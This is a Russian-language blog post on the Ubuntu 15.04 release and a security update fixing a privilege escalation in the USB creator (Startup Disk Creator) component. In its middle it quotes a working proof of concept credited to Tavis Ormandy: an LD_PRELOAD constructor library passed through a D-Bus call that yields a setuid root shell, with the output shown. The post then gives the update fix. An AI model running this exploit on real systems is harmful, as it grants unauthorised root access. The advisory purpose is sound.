Первое обновление безопасности Ubuntu 15.04

Не успела выйти новая версия Ubuntu 15.04 (Vivid Vervet), как уже на подходе обновление безопасности. Canonical решили оставаться в тренде и брать от мира открытого ПО самые сливки. В этой версии они решили таки отказаться от своей системы инициализации upstart и перейти на темную сторону на systemd. Естественно, пилить свое и своими силами всегда более ресуроемко, нежели обратиться к мировому сообществу лицом, редхатовцы/федоровцы скорей всего дико возликовали от этой новости.

Не буду публиковать описание всех изменений, которые произошли в этой версии. Это можно прочитать на более крутых новостных ИТ-ресурсах ;-) Процитирую opennet.ru

Ключевым новшеством Ubuntu 15.04 является перевод дистрибутива на системный менеджер systemd, который заменил собой систему инициализации upstart в конфигурации по умолчанию. Опциональная возможность использования upstart оставлена (загрузку с upstart можно выбрать в меню «Advanced options for Ubuntu» в GRUB), более того компоненты upstart пока оставлены для управления пользовательскими сеансами. В рамках текущего цикла разработки решено не переводить на systemd Ubuntu Touch. Источник: opennet.ru

Еще хочу обратить внимание на дистрибутив Ubuntu MATE. Решили отобрать кусок хлеба у дистрибутива Linux Mint ;)

04_DESKTOP

Но перейдем к самое теме публикации — обновлении безопасности Ubuntu Linux 15.04.

Обновление коснулось компонента USB creator, который еще называется Startup Disk Creator. Разработчик Тэвис Орманди обратил внимание, что это приложение запускает программы от учетной записи администратора. Это чревато тем, что злоумышленник, имеющий физический доступ к системе может получить административные привилегии.  Эта проблема так же выявлена в следующих версиях дистрибутивах: Ubuntu 14.10, Ubuntu 14.04 LTS, и Ubuntu 12.04 LTS. Это заявление приняло статус официального заявления проблемы с безопасностью и обновление системы вышло так быстро, как это было возможным.

Пример работы этой уязвимости от Тэвиса:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}

$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Для устранения этой проблемы следует обновить пакет usb-creator-common до последней версии. Для обновления следует выполнить две команды в терминале

sudo apt-get update
sudo apt-get dist-upgrade

Либо произвести обновление из оконного интерфейса с помощью менеджера обновлений. После окончания процедуры обновления перезагрузка сервера не потребуется.

 

Другие публикации по теме:

Как удалить, установить и перенастроить xorg без п... Это руководство описывает возможность удаления, установки и перенастройки xorg без переустановки ubuntu. Это очень полезно, особенно если  испорт...
Как установить firefox 3.6 stable из репозиториев ... Это руководство описывает процесс установки последней стабильной версии firefox 3.6 из репозиториев Ubuntu. Для пользователей ubuntu karmic/Lucid...
Как установить adobe flash player 10.1 beta в Ubun... Это преварительная версия Adobe® Flash® Player 10.1 для разработчиков, доступная в версиях к Windows, Macintosh и Linux. К ней открыли доступ для разр...
PAC manager — полная замена SecureCRT/Putty ... PAC это написанная на Perl/GTK для замены SecureCRT/Putty/и т.п в Gnome… Он предоставляет оконную настроку SSH/Telnet соединения: пользователи, пароли...

Поделиться информацией с друзьями!

Чтобы не пропустить обновления, подпишись на RSS или почтовую рассылку (свой выбор сделали уже 128 человек!)

Оставить комментарий